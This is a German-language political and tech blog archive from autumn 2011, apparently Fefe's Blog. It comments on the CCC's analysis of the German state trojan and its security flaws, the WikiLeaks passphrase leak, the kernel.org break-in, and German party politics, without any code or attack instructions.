Es ist mir eine besondere Freude, heute auf diese Presseerklärung des CCC zu verlinken. Denn dem CCC sind tatsächlich Trojaner zugespielt worden, von denen wir nach eingehender Analyse glauben, dass es sich um "Quellen-TKÜ" handelt. Und die Ergebnisse der Analyse sind ernüchternd.
Von den ganzen Zusagen nach dem Bundestrojaner-Urteil des Verfassungsgericht ist nichts übrig geblieben. Es hieß, der Quellen-TKÜ-Trojaner sei was gaaaaanz anderes als der Bundestrojaner für die "Online-Durchsuchung" und könne gar keine fiesen Dinge tun, nur Skype abhören und so. Tatsächlich aber hat der Trojaner eine Nachladefunktion für beliebige zusätzlich Malware. Es hieß, alle Versionen werden für den speziellen Fall manuell entwickelt, aber in der Realität sind die Trojaner nicht nur sehr ähnlich, sie verwenden auch denselben hartkodierten AES-Schlüssel für die Absicherung der C&C-Verbindung. Und wenn ich AES sage, meine ich AES im ECB-Modus, und es wird nur in eine Richtung verschlüsselt. Und der Schlüssel ist wie gesagt hartkodiert. Die Richtung mit Verschlüsselung ist der Antwortkanal des Trojaners. Der Kanal, über den man zusätzliche Malware nachladen kann, ist gänzlich ungesichert. Integritätsprüfung (digitale Signatur, HMAC o.ä.) oder gar kryptographische Authentisierung gibt es gar nicht.
Oh und Teil des Trojaners ist ein Kernelmodul, allerdings ohne Tarnfunktion (das war wohl zu kompliziert) sondern nur mit Keylogger. Das Kernelmodul stellt Operationen wie "leg mal ne Datei unter diesem Pfad an" oder "schreibe das hier in die Registry" zur Verfügung, und die Keylogger-Funktionalität ist deaktiviert — der Code ist aber noch erreichbar, und dank dilettantischer Anfängerfehler im Rest des Kernelmoduls kann man ihn trotzdem aktivieren und benutzen.
Wenn dieser Trojaner auf einem Rechner installiert ist, steht der danach für jeden offen wie ein Scheunentor, ganz ohne dass man einen Exploit bräuchte. Man muss nur anklopfen und den Trojaner freundlich bitten. Und das Kernelmodul räumt allen lokalen Benutzern Adminrechte an. "Scheunentor" ist zu kurz gegriffen, um das katastrophale Sicherheitsniveau dieser Software zu beschreiben. Die CCC-Reverser dachten erst an einen besonders gewieften Tarnungs-Trick, als sie für AES nur den Verschlüsselungscode fanden und nicht den Entschlüsselungscode.
Der CCC hat für die Scheunentor-API des Trojaners ein GUI geschrieben, das wir mal in einem kurzen Video vorstellen werden. Die Antivirenhersteller haben inzwischen Kopien des Trojaners erhalten und sollten ihn ab morgen früh erkennen und entfernen können, zumal keine Rootkit-übliche Tarnfunktionalität in dem Kernelmodul implementiert war. Aber macht euch keine Sorgen, wir haben den Behörden rechtzeitig Bescheid gegeben, dass sie noch schnell den Selbstzerstörungsknopf drücken können.
Oh, und, ganz wichtig noch, falls ihr ein Andenken haben wollt: die FAZ hat dazu eine Meldung gemacht und wird dem Thema in der FAS-Ausgabe morgen mehrere Seiten widmen. Und zwar, wie ich hörte, inklusive Auszügen aus dem Disassemblat. Wer also die erste Print-Tageszeitung haben will, in der Quellcode von Malware abgedruckt ist, sollte sich morgen eine FAS sichern. Oder halt online lesen, aber das ist ja nicht das gleiche in dem Fall :) Ein Listing-Service in der FAZ, wie damals bei der "DOS International"!
Update: Die Zeit ist auch im Boot.
Update: Erstaunlicherweise ist der C&C-Server immer noch online, und mir erzählt gerade jemand, dass da ein Plesk von 2009 drauf läuft. Die BESTEN der BESTEN der BESTEN, SIR!
Falls sich jetzt jemand wundert, wieso ich die FAZ so plugge: Schirrmacher (Herausgeber) hat einen Leitartikel zum Thema geschrieben, und da hält er das Flammenschwert der Gerechtigkeit in den Händen und kloppt auf genau die richtigen Stellen. Er schreibt nicht nur, dass so ein Trojaner ja grundsätzlich immer alles kann, sondern zeigt auch auf die Nonnenmacher-Geschichte mit den zu Diskreditierungszwecken hinterlegten Kinderpornobildern und spricht in der Kontext von "der neuen Vernichtungsstrategie in der digitalen Welt". Und dann spricht er das Offensichtliche gelassen aus:
In Zeiten einer „Piratenpartei“ kann der Fund des Chaos Computer Clubs die politische Geographie nachhaltig ändern.
So sieht das aus. Ich bin mir sicher, dass da dem politischen Establishment gerade mit Nachdruck der Arsch auf Grundeis geht. Es freut mich sehr, solche Gedankengänge in den etablierten Leitmedien zu lesen. Nicht mehr nur in Verschwörungsblogs wie dem meinen.
Update: Wenn ich schon am erzählen bin, kann ich ja auch noch ein bisschen mehr plaudern. Der eine oder andere wird sich vielleicht gedacht haben, hey, so ein Trojaner, das ist ein komplexes Stück Software, das schaffen die doch bestimmt nicht ohne Plagiieren von Open Source, da ist doch bestimmt noch ne GPL-Verletzung zu haben. Nicht GPL, aber Speex haben wir gefunden, und die Lizenz wurde verletzt. Ich hörte, ein Anwalt sei schon unterwegs.
Update: Das ehemalige Nachrichtenmagazin hat immer noch keine Meldung. Vor ~~zwei~~ drei Stunden ging die dpa-Meldung raus. Nichts. Wow. Da scheint mir die personelle Nähe zu den Geheimdiensten noch ausgeprägter zu sein als bisher angenommen. "Sturmgeschütz der Demokratie", dass ich nicht lache.
Update: Heise, ZDF Heute, Tagesschau, Golem, Gulli aber immer noch nichts bei Spon. Und auf Twitter musste sich ZDF Heute schon anpupen lassen, wieso sie in ihrer Nachtsendung nichts gebracht haben :-)
Update: Jetzt hat auch Spon was, und sie greifen bei den Zitaten in die Vollen, erwähnen sogar explizit den Wirtschaftsspionageaspekt bei der Durchleitung durch die USA. Inzwischen ist die Geschichte auch in Österreich angekommen und sogar sogar in den USA berichten erste Blogs. Oh und sogar die "Bild" war schneller als Spon. Oh und fürs Archiv solltet ihr euch zum Vergleich auch nochmal die BMI-FAQ zum Bundestrojaner durchlesen, mit Statements wie
Die Datenübertragung wird derart verschlüsselt erfolgen, dass der Zugriff Dritter hierauf ausgeschlossen ist und die übermittelten Daten durch hohe Datenschutzstandards geschützt sind.
Update: Jetzt hat das ehemalige Nachrichtenmagazin noch einen richtigen Artikel nachgelegt und damit sogar den Vetter von der Pole Position verdrängt.

Fri Oct 7 2011

[l] Die Piraten machen jetzt Online-Umfragen mit einem externen Online-Umfrage-Tool. Es ist nicht klar, wieviel Entscheidungsgewalt diese Umfrage tatsächlich hat, aber es sieht für mich schon so aus, als werteten sie das als "die Stimme der Basis".
Pro: Immerhin steht der Server in Deutschland.
Contra: Bei Hetzner.
Contra: Durch Löschen des Session Cookies kann man das wohl austricksen.
Mir ist ja nicht klar, wieso sie das überhaupt machen, sie haben doch LiquidFeedback. Extra für den Zweck, wenn ich das mal anmerken darf. Und ohne die Idee, dass das eine "geheime Abstimmung" ist.
Ob die das jetzt wie die CSU machen? Ich finde das ja schade, dass das so schnell ging. Ich dachte, dass die Piraten nach dem ersten Wahlerfolg länger als nur ein paar Wochen durchhalten, bevor sie sich so krass lächerlich machen.
Update: Die Piraten betreiben, so wird mir gerade versichert, eine eigene Instanz von LimeSurvey. Damit fällt der Contra-Punkt weg, dass das bei Hetzner läuft (das ist auch nur jetzt gerade Contra, weil die gerade gehackt wurden).
Update: Mich erreicht gerade diese Mail:
nur zu Deiner Info: in Bundesländern südlich der Mainlinie ist LiquidFeedback vorsichtig gesagt höchst umstritten. Wir nutzen hier überwiegend LimeSurvey und haben damit sehr sehr gute Erfahrungen gemacht.
Das war genau was ich befürchtet hatte und der Auslöser für dieses Blogposting. Genau wie Facebook-Fraktion. "Ist doch aber so praktisch".

Thu Oct 6 2011

[l] Das betrifft vermutlich den einen oder anderen unter meinen Lesern: sieht aus als hätte jemand den Hetzner aufgemacht und die Kundendaten rausgetragen.

Tue Oct 4 2011

[l] Auf DIE Schlagzeile warte ich ja seit JAHREN: "Pofalla wird Merkels Problemfall".
Der Pofalla überzeugt seit vielen Jahren durch … nichts. Ich könnte auf Anhieb nicht eine Sache nennen, die ich mit dem assoziiere, die er mal gemacht hat, und die man als positiv werten könnte. Nichts. Noch nie. Eigentlich könnten sie den auch direkt zum Bundespräsidenten machen.
Der Lacher an der Geschichte ist aber, dass das jetzt auf einen Streit zwischen Pofalla und Bosbach zurückgeht. Und da soll der Pofalla dem Bosbach folgendes gesagt haben:
"Ich kann deine Fresse nicht mehr sehen", so soll es Pofalla dem Euro-Abweichler Wolfgang Bosbach in der vergangenen Woche am Rande einer Sitzung der CDU-Bundestagsabgeordneten aus Nordrhein-Westfalen entgegengeschleudert haben
Und DAS wäre ja geradezu eine Trendwende. Das wäre das erste Mal, dass ich dem Pofalla inhaltlich zustimmen kann.
Ist ja am Ende auch egal. Wenn sich Pofalla und Bosbach streiten, kann es nur Gewinner geben.
Update: Oh, die Nummer hat ja noch andere großartige Aspekte, z.B. droht der Bosbach jetzt, 2013 nicht mehr anzutreten. Das wäre ja echt das Optimum, wenn der Pofalla jetzt über sein Gepöbel stürzt und der Bosbach zurücktritt. Beide auf einmal weg!
Oh und einen hab ich noch: Bosbach beruft sich auf das Grundgesetz! Bosbach!! Auf das Grundgesetz!!! Dass Abgeordnete nur ihrem Gewissen verpflichtet seien. Was für eine Farce.

Sat Oct 1 2011

[l] Ah, die Sache mit der Netzneutralität geht langsam in die "zu spät" Phase über. Facebook hat einen Deal mit diversen Mobilfunkanbietern gemacht, dass man kostenlos auch mit abgelaufener Prepaid-Karte noch Facebook klicken kann. Als nächstes muss dann die Konkurrenz nachziehen, und am Ende zahlt man nur noch für den Zugriff auf die nichtkommerziellen Seiten im Internet. Wie z.B. dieses Blog hier.

Wed Sep 28 2011

[l] Lacher des Tages: Al Kaida meckert mit Achmedinedschad, er soll doch mal mit den 9/11-Verschwörungstheorien aufhören, dass die US-Regierung selber den WTC kaputtgemacht habe.
Wem das irgendwie bekannt vorkommt: The Onion hat das vor ein paar Jahren als Satire gebracht.
Kann man sich gar nicht ausdenken, sowas. (Danke, Mathias)

Mon Sep 26 2011

[l] Die FDP geht übergangslos zur Wählerbeschimpfung über. Und das ganze garniert mit einer wunderschönen Verschwörungstheorie:
Heißt: Nicht die FDP macht Fehler, die Wähler sind einfach zu dumm für die FDP. Klar, gedacht haben das viele schon. Und hinter vorgehaltener Hand wird seit langem gemunkelt, dass in den SPD-geführten Ländern deswegen so wenig für Bildung gemacht wird, damit die FDP keine Schnitte mehr hat.
BWAHAHAHA, wunderbar!

Fri Sep 16 2011

[l] Der Piratenpartei droht gerade aus einer unerwarteten Ecke Ungemach. In Berlin kriegt man nicht einen Sitz pro Prozent Stimmen, sondern bei 10% Stimmen kriegt man so 14-16 Sitze im Abgeordnetenhaus. Die Piratenpartei hat 15 Kandidaten auf ihrer Liste. Laut Umfragen sind sie bei 9% im Westen und im Osten sogar bei 12%. Die Sitze blieben dann leer, weil keiner auf der Liste ist. Naja, das sind jetzt nur Umfragen, das wird sich zeigen, wei das tatsächliche Wahlergebnis ist. Aber das wäre schon echt abgefahren, wenn das zum echten Problem wird.
Update: Whoa, mich erreicht gerade zu dem Thema ein beeindruckend guter politischer Spin von den Piraten Thüringen. Kurz gesagt: das sei ja DIE CHANCE für Nichtwähler. Normalerweise können die ja nur Leute reinwählen, nicht Leute rauswählen. Man kann seinen Protest also nur zeigen, wenn man für jemanden anderen stimmt. Jetzt hat man die einmalige Chance, die Piraten zu wählen, und damit SPD und CDU und so rauszuwählen, ohne dafür jemanden reinwählen zu müssen, mit dem man möglicherweise nicht übereinstimmt. Das hinkt natürlich, das Argument, und weil Nerds nicht lügen können, schreibt der gute Mann das auch selber in seinem Beitrag.
[l] De Maiziere hat die Lösung für unsere Wirtschaftsprobleme gefunden! Was sagt ihr, der ist gar nicht zuständig? Na aber hallo!
De Maiziere hat einen Deal mit Russland zur Modernisierung von deren Armee gemacht. Das sollen sich die Russen bis 2020 alleine 500 Milliarden Euro für bessere Ausrüstung kosten lassen.

Sun Sep 11 2011

[l] Braucht ihr mal Aufheiterung? Dann hab ich hier was. Es geht um diese grandiose Posse. Der SPD-Politiker (ha!) Sebastian Edathy ist innerhalb seines Politiker-Realitätsverzerrungsfeldes mit der harschen Realität konfrontiert worden, weil er im Internet das Urheberrecht verletzt hat. Er hat nämlich auf seiner Facebook-Seite Fotos veröffentlicht, an denen er die Urheberrechte nicht hat.
Das ist ja schon aufheiternd, aber dieser offene Brief an den Herrn Edathy hat für mich persönlich die Sache erst richtig rund gemacht.

Sat Sep 10 2011

[l] Wie erbärmlich: Detlef Borchers hat zwei Strafanzeigen wegen Wikileaks am Bein. Borchers hat für Heise die *leaks-Berichterstattung gemacht. Na DAS schafft ja Sympathiepunkte, Journalisten verklagen!11! Ich hoffe ja, dass bekannt wird, wer ihn da angezeigt hat.
Es waren wohl Heise-Leser.

Tue Sep 6 2011

[l] Während Alvar bei der SPD seine Otto-Schily-Transformation fortführt (Otto war ja ursprünglich RAF-Verteidiger und Linker, bevor er Innenminister und Volksüberwacher und -unterdrücker in Spe wurde; naja, auch Darth Vader hat mal als Guter angefangen) und einen länglichen Artikel mit der Aussage "Wir sind immer noch gegen die VDS, führen sie aber trotzdem mal ein" schreibt, destilliert sich am Ende alles auf dieses eine Argument herunter:
Wir dürfen nicht vergessen, dass die EU-Vorgaben eine umfassende Vorratsdatenspeicherung vorsehen.
Das ist ja auch das einzige Argument, das die Verräterpartei noch hat. Alle anderen haben wir ihnen zerschossen.
Und ich finde, es ist an der Zeit, sich mit diesem Argument mal offensiv zu beschäftigen. Stimmt das eigentlich, dass wir hier unter Zugzwang sind, weil "die EU" eine Regelung gemacht hat? Warum hat die EU denn so einen Müll überhaupt in Erwägung gezogen? Weil Deutschland dafür war. Deutschland war dafür, weil unsere Junta es bei uns nicht durchgekriegt hat. Also haben sie es auf EU-Ebene gemacht. Die selben Flachpfeifen, anderes Gremium, damit sie jetzt hier dieses "Sachzwänge"-Scheinargument bringen können.
Wenn wir uns mal die Realitäten in der EU angucken, dann ist Deutschland eh schon immer der größte Nettoeinzahler. Wir finanzieren die EU. Nicht alleine, nein. Aber zum Gutteil. Wir haben auch mit Abstand den größten Einfluß in der EU. Gerade jetzt im Zeitalter der Rettungsschirme und Eurobonds ist es Otto Schilys Nachfolger Wolfgang Schäuble, der die EU nach unserer Pfeife tanzen lässt. Wenn Deutschland sich jetzt hinstellt und sagt, hey, das mit der Vorratsdatenspeicherung, das tut uns leid, das war faschistoide Scheiße, gerade wir hätten das besser wissen sollen, lasst uns das mal zurückrollen. Was glaubt ihr, wie lange das dauern würde, bis die EU das zurückrollt?
Aus meiner Sicht ist das ganze EU-Sachzwang-Gefasel ein von langer Hand vorbereiteter Schwindel, um uns hier im politischen Mitspracherecht einzuschränken.
Nein, wir wollen das nicht. Und wir wollen das auch nicht für die anderen EU-Länder. Es wird an der Zeit, dass wir das mal so ansagen, glaube ich. In diesem Sinne: Am Samstag ist die Freiheit statt Angst-Demo in Berlin. Kommt zahlreich!

Fri Sep 2 2011

[l] Es sieht so aus, als sei jetzt die ganze Schmierengeschichte um die Wikileaks-Passwörter draußen. Und es haben sich alle Seiten nicht mit Ruhm bekleckert.
An erster Stelle Julian, der hat dem Guardian die Cables mit gnupg verschlüsselt gegeben, indem er sie auf den öffentlichen wikileaks.org-Server hochlud, unter einem "geheimen" (nicht verlinkten) Pfad. Und dann hat er vergessen, diese Datei wieder zu löschen, als der Guardian sich die gezogen hatte.
Der Schutz dieser Daten bestand a) aus dem Passwort und b) daraus, dass der Pfad "geheim" und nicht verlinkt war.
Später haben dann die Daten die Runde gemacht, weil es auch einen Torrent mit den Daten vom Webserver gab. Und da gehörten eben auch diese verschlüsselten Dateien dazu. Die hießen sowas wie "/xyz/z.gpg".
Wikileaks hatte Regeln für den Umgang mit der Presse. U.a. stand da drin, dass es nicht ein Master-Passwort gibt, sondern eines pro Medienpartner. Dagegen hat Julian in diesem Fall verstoßen.
Die nächste Figur ist David Leigh, ein Guardian-Reporter. Der hat damals von Julian die Daten und die Passphrase gekriegt. David Leigh schreibt daraufhin ein "Enthüllungsbuch" und wählt die Passphrase als Überschrift für das Kapitel 11. Der Kontext in dem Buch zeigt, dass er nicht annahm, dass die Passphrase noch gültig ist bzw noch irgendwas öffnen würde.
Die dritte Figur ist Daniel, der die Passphrase wiedererkannt und dann offenbar Medienpartnern erzählt hat, dass man damit die unredigierten Cables öffnen kann. Auf ihm lastete die Beweislast für seine Ansage, dass Wikileaks ja keinen ordentlichen Quellenschutz garantieren könne. Und die Medien machten ihm Druck deswegen. Wann er da wem was gesagt hat, das kann ich von außen auch nur spekulieren, aber dass der Freitag (Daniels Openleaks-Medienpartner) plötzlich aus blauem Himmel in der Lage ist, da die Puzzlestücke zusammenzusetzen, und diesen katastrophalen Dammbruch-Artikel zu veröffentlichen, das halte ich für keinen Zufall. Dort beschreiben sie, dass es eine Datei im Internet gibt, dass es ein Assange-Passwort im Internet gibt, und dass man mit dem Passwort die Datei entschlüsseln kann. Damit war dann auch dem letzten Idioten klar, dass er nach "wikileaks torrent" und nach "assange password" googeln muss und dann die Passphrase auf alle Dateien im Torrent ausprobieren muss und dann fallen da die Cables raus.
Das Problem ist, dass man da beim Schuldzuweisen Interpretationsspielraum hat, und Stellen, an denen Aussage gegen Aussage steht.
Julian wirft dem Leigh vor, dass er die Passphrase veröffentlicht hat. Der sagt nun, Julian habe ihm damals angesagt, dass die Passphrase nur temporär und danach wertlos sei. In seinem Buch ergibt sich tatsächlich nicht der Eindruck, dass ihm bewusst war, dass die Passphrase noch irgendwas öffnen kann. Aber dass die nur temporär war, schreibt er halt auch nicht explizit. Insofern könnte das eine Schutzbehauptung sein. Ich kenne den Leigh nicht, aber würde da im Zweifelsfall auf Verpeilen tippen, nicht Bösartigkeit. Bei mir hat der jetzt verkackt, weil er eine Passphrase veröffentlicht hat. Sowas tut man niemals nie nicht unter gar keinen Umständen, schon gar nicht wenn die von jemand anderem ist.
Auf der anderen Seite muss Julian im Umgang mit Journalisten soweit Erfahrung haben, dass er davon ausgeht, dass Journalisten im Umgang mit Technik inkompetent sind und für eine gute Schlagzeile auch gerne mal Zusagen ignorieren. Dass er da keine Temp-Passphrase genommen hat, und die Datei auf dem Webserver gelassen hat, das hat er verkackt und kann das auch niemandem sonst anlasten.
Oh übrigens, falls ihr euch gefragt habt, wieso Julian eigentlich überhaupt von Daniel ein Backup der Daten brauchte und nicht selber eines hatte: die Antwort steht in dem Spiegel-Wikileaks-Buch ab Seite 267. Julian flog mit der SAS von Schweden nach Berlin und hatte einen Koffer aufgegeben. In dem Koffer waren seine drei Laptops. Mit den verschlüsselten Daten. Überraschenderweise kam der Koffer nicht an. Also DAMIT konnte ja wohl NIEMAND rechnen!1!!
Wer hat jetzt also Schuld? Daniel? Dem kann man bisher wenig anlasten in der Richtung, zumindest in den Teilen, mit denen er sich tatsächlich zitieren ließ. Meine Vermutung ist ja, dass der von seinen Kumpels beim Freitag gesäckelt wurde, wie denn das jetzt ist mit Wikileaks und dem Quellenschutz, weil Julian ja immer wieder darauf hinwies, dass da ja nie jemand zu Schaden gekommen sei. Und da hat Daniel dann, vermute ich mal, sich mit denen hingesetzt und denen gezeigt, wie man mit dem Passwort aus dem Guardian-Buch und den Dateien aus dem Torrent und gnupg die unredigierten Cables aus dem Hut zaubert.
Ich schätze Daniel übrigens nicht als Marodeur ein. Der wird denen das gesagt haben, damit sie eine Antwort haben, nicht damit sie es publizieren. Aber so ist das halt bei der Presse. Auf "off-the-record" kann man sich da nicht verlassen. Manchen Medien ist da die schnelle Schlagzeile wichtiger als Absprachen oder Menschenleben. Immerhin ist es mir eine Genugtuung, dass der Freitag sich damit auch alle zukünftigen Chancen zerschossen hat, dass ihnen jemals jemand was leaken will. Der Vollständigkeit halber sei erwähnt, dass ich von mehreren Seiten die gegenteilige Einschätzung gehört habe, dass die Fragen so klingen, als habe Daniel sie dem Freitag diktiert und überhaupt sei das eine Agenda von Daniel gewesen, um Wikileaks anzupinkeln. Kann ich nicht beurteilen, ist Hörensagen, im Zweifelsfall für den Angeklagten.
Objektiv liegt die Hauptschuld hier bei der Presse, in Form von Leigh vom Guardian und Krafft vom Freitag, die die wichtigen Details veröffentlicht haben. Das Veröffentlichen einer verschlüsselten Datei ist kein Grund für Kritik, denn dafür ist sie ja verschlüsselt, damit man sie veröffentlichen kann.
Ebenso objektiv liegt die Hauptschuld aber dann doch bei Julian und Daniel. Julian, weil er hätte wissen müssen, wie man Presse handled, weil seine OpSec Scheiße ist, weil er die Datei da hat liegen lassen, und weil er die Passphrase wiederbenutzt hat. Hätte Julian sich an die OpSec-Regeln von Wikileaks gehalten, hätte die Datei für den Guardian eine eigene Passphrase gekriegt, Leigh hätte sie abdrucken können, Daniel hätte sie nicht wiedererkannt, und all die Scheiße jetzt wäre uns erspart geblieben. Daniel, weil er das nicht hätte rausplappern müssen. Dadurch hat er das große Fass erst aufgemacht. Ja, das Fass hatte vorher schon ein Leck. Aber das erteilt ihm keine Absolution.
Man sieht aber ganz gut, wie sich da aus lauter kleineren Fehlern eine Scheiße-Lawine ergab, in denen die Leute die Lage mit Folgefehlern nur schlimmer gemacht haben, aus dem Bedürfnis heraus, ihren Hintern bezüglich der früheren Fehler abzudecken.
Soweit zu meiner Bewertung der Lage. Dementis von Leigh, Krafft, Julian oder Daniel nehme ich unter der bekannten Adresse gerne entgegen :-)
Update: Ich muss mich korrigieren. Ich schrieb, wenn das ein Einmal-Passwort gewesen wäre, dann hätte Leigh das veröffentlichen können. Hätte er natürlich trotzdem nicht, weil ein Geheimdienst, der das mitgeschnitten hat, dann auch die Cables entschlüsseln könnte. Das war so gemeint, dass Daniel dann die Passphrase nicht wiedererkannt hätte. Das wäre immer noch lausige OpSec gewesen, aber der Shitstorm wäre uns erspart geblieben.

Thu Sep 1 2011

[l] Auf kernel.org gab es einen Einbruch. Genaugenommen auf dem Zentralrechner da, von dem das ganze Netz mirrort. Ich bin da auf ner Mailingliste, weil ich da auch einen Account habe und damit theoretisch betroffen bin, und kann daher ein paar Details erklären.
Das sieht alles aus wie ein Standard-Rootkit, und das kam rein über einen legitimen Account eines Benutzers auf der Maschine, dem sein Rack-Server aufgehackt wurde. Offenbar wussten die Angreifer nicht, was sie da wertvolles aufgemacht hatten, jedenfalls haben sie nichts groß verändert außer halt sich da ins System einzunisten und das ssh zu ersetzen und so.
Die Linux-Kernel selbst sind nicht betroffen, und können auch gar nicht groß betroffen sein, weil die aus Linus' Privatsystem kommen, nicht von dort. git ist ein verteiles Versionierungssystem und da liegt nicht auf dieser Kiste auch "der git-Server", über den man die Kernelsourcen kompromittieren könnte. Und selbst wenn, dann benutzt git kryptographische Prüfsummen, das würde sofort auffallen, wenn da jemand was in der Versionsvergangenheit manipulieren will. Es gibt natürlich trotzdem noch ein paar offene Fragen, und sicherheitshalber haben sie doch alle in letzter Zeit veränderten oder hochgeladenen Tarballs nochmal überprüft. Aber akute Angst muss wohl keiner haben.
Es zeigt aber natürlich trotzdem, dass nicht mal die Linux-Kernel-Leute vor sowas gefeit sind. So schlimm ist der Stand der Computer-Security. Seufz.
Oh, eines noch: der Useraccount hatte keinen Superuser-Zugriff. Das Rootkit schon. Es gibt also noch mindestens einen Exploit für local privilege escalation unter Linux unter x86-64. Gut, das wird jetzt niemanden überraschen, der sich mit der Materie auskennt, aber es ist natürlich schon beunruhigend. Auf der anderen Seite wird das jetzt vielleicht eine Audit-Hetzjagd lostreten, bei der dann der und einige andere Fehler gefunden werden.

Tue Aug 30 2011

[l] Ich habe ja von Daniel und Julian Abstand gehalten in letzter Zeit, weil ich den Zickenkrieg nicht noch befördern wollte, aber das hier hat wirklich Nachrichtenwert, wenn es denn stimmt: Es sieht so aus als habe sich der "Architekt" von Openleaks losgesagt. Das ist der anonyme Techie im Hintergrund, der die ganze Software gehackt hat. Nun kann er das schlecht nachweisen, dass er das ist, insofern könnte das natürlich auch alles Fake sein. Wer weiß.
Die Behauptungen, die er da aufstellt, haben jedenfalls Sprengkraft. Dort steht, diesmal habe er das Submissionsystem dagelassen beim Gehen, aber er will jetzt unabhängig den Quellcode veröffentlichen (die einzig richtige Herangehensweise, wenn ihr mich fragt). Da ist auch noch die Rede von Chatlogs zwischen Daniel und Julian, deren Veröffentlichung er erst ankündigt aber das dann wieder zurückzieht.
Eine weitere seiner Botschaften ist, dass Daniel vor dem Zerstören seines Schlüssel Backups gemacht hat. Oh und er sagt an, dass in dem insurance-File auf Wikileaks das cables.csv drin ist, von dem man so viel gehört hat.
Die wichtigste Ankündigung ist aber, dass "morgen früh" (das schrieb er gestern) die Quellen bei github liegen sollen. Insofern spekuliere ich jetzt nicht groß herum. An ihren Taten sollt ihr sie erkennen, nicht an ihren Worten.
Update: ex_wl_arch (kleines L) nicht ex_wI_arch (großes I), wo wir gerade bei Trollen waren :-)
Update: Im Quellcode von openleaks.org ist am Ende ein Dementi aufgetaucht.
Update: Und jetzt dementiert auch der Twitter-Account selber. Ich denke mal, dass der Scherzkeks ab jetzt bei Grenzübergängen längliche Untersuchungen über sich ergehen lassen muss, insofern hat das seine poetische Gerechtigkeit.

Sun Aug 28 2011

[l] Mir fällt gerade anlässlich der aktuellen Alternativlos-Sendung über Ressourcenknappheit auf, wie viele Computerspiele das seit vielen Jahren als Teil ihres Narrativs haben. Gerade aktuell gibt es eine Häufung von solchen Spielen. Früher waren es noch die Russen, ein nicht näher erklärter Atomkrieg, vielleicht eine Alien-Invasion, Zombies, heute sind es fast immer verknappende Bodenschätze, die die Kulisse hergeben. Sogar bei der altehrwürdigen Fallout-Serie, die in einer Post-Atomkrieg-Welt spielt, geht der Konflikt am Ende auf Ressourcen zurück. Ansonsten sind die postapokalyptischen Spiele gerade überall, von Rage über Borderlands, Deus Ex, Fallout New Vegas, Brink, Crimecraft, wo man auch hinguckt gibt es irgendeine postapokalyptische Welt. Und in der Mehrzahl davon geht der Konflikt auf Ressourcenkonflikte zurück.
Ich finde das eine spannende Entwicklung. Ist das jetzt ein Spiegel der Gesellschaft und das ist eh schon im Mainstream-Bewusstsein angekommen als Problem bzw "so wird unsere Zukunft"? Oder werden Computerspiele halt von Leuten gemacht, die sich im Internet aufhalten, und die sich dort von Verschwörungsblogs haben radikalisieren lassen?
(Übrigens: kurzer Hinweis am Rande: das Geld für Deus Ex kann man sich auch sparen und stattdessen auf dem Grabbeltisch für 10 Euro Alpha Protocol kaufen, das ist praktisch das gleiche Spiel, sogar vom Stil her fühlt sich das gleich an. Deus Ex kann man auch in ein paar Wochen im Sonderangebot kaufen. Mir ist unbegreiflich, wieso Alpha Protocol damals nur so 60% Rating kriegte, aber Deus Ex jetzt 90%)

Thu Aug 18 2011

[l] Wenn man beim WLAN-Anmelden ein Netz mit der SSID "FBI_SURVEILLANCE_VAN" findet, würde man das erstmal für einen Scherz halten. Aber so operiert das FBI tatsächlich.
Update: Na super, von dem Artikel ist so gut wie nichts mehr übrig. Sorry. Als ich drauf linkte, stand dort eine Story von einem Jugendlichen, der vom FBI beobachtet wurde, weil sie dachten, er wolle eine Schule in die Luft sprengen, und weiter unten zitierten sie einen Tweet von ihm, wo er erzählte, beim WLAN-Auswählen habe er besagte SSID gesehen.
Update: Mir mailt jemand, dass das kein Tweet sondern ein Posting auf Facebook war (Achtung: Link geht zu Facebook, und ohne Einloggen sieht man nichts)
Update: Mir hat jemand nen Link zu einem Screenshot gemailt

Wed Aug 17 2011

[l] Die Bundesregierung hat die Terrorgesetze verlängert. Der Kommentar der Süddeutschen ist eine Mischung aus bissig und resignierend. Das Money Quote ist am Ende:
"Wir sind dazu gewählt, Entscheidungen zu treffen und wir haben es gemacht", sagt Friedrich, als wäre das eine Selbstverständlichkeit. Am Schluss setzt er nach: "Die Regierung regiert. Wenn Sie etwas anderes lesen, glauben Sie es nicht."
Erinnert mich ein bisschen an den Kollegen hier. (Danke, Michael)

Tue Aug 16 2011

[l] Hach ist das schade, dass die OpenLeaks-Medienpartner jetzt nicht ihre Chance zum diskreten Klappe-halten nutzen. Und so müssen wir uns peinlich berührt mit Dingen wie diesem Interview des taz-Zuständigen Reiner Metzger befassen, wo er so zum Fremdschämen einladende Dinge sagt wie
Reiner Metzger, stellvertretender Chefredakteur der "taz", zeigt sich verwundert über den Rausschmiss. Solche Massentest seien eigentlich eine "übliche Methode".
Nein, Herr Metzger. "Massentests" von Software sind nicht üblich. Üblich ist, dass man den Quellcode offenlegt und die Leute gucken lässt. Oder wenn die Software kommerziell ist, dann legt man den Quellcode einem Team von Auditoren unter NDA offen. Bei einem Massentest von außen ist die Aussage so gut wie Null. Das ist ungefähr so schlau wie die Statik einer Brücke zu testen, ohne dem Statiker die Pläne zu zeigen oder ihn die Brücke aus der Nähe angucken zu lassen.
Weniger schlimm ist der Artikel beim Freitag, aber es hätte an der Stelle immer noch deutlich souveräner gewirkt, wenn die einfach ruhig gewesen wären. Denen macht schließlich niemand einen Vorwurf. Wenn die sich jetzt verteidigen, indem sie gegen den CCC schießen, dann ist das der gleiche Fehler, den der CCC mit dem Rausschmiss begangen hat: es sieht unsouverän aus. Als ob die jetzt auch mitmachen wollen bei der Schlammschlacht.
Spannenderweise scheint Daniel Domscheit-Berg das jetzt verstanden zu haben und war auch nicht für eine persönliche Stellungnahme zu erreichen. Mein Rat an Daniel ist: nicht reden, handeln. Den Quellcode veröffentlichen, den Businessplan veröffentlichen, das Konzept veröffentlichen. Ohne wenn und aber, ohne Anmeldung, für jeden, völlig barrierefrei. Das gleiche gilt natürlich auch für Wikileaks, aber da scheint ja eh niemand davon auszugehen, dass die sich nochmal aufraffen.
Update: Ich kriege gerade eine Mail von dem Metzger. Er sagt, den zitierten Teil hat er in dem Interview gar nicht gesagt, und im Übrigen stimmt er mir zu, dass man da den Quellcode offen haben sollte.

Wed Aug 10 2011

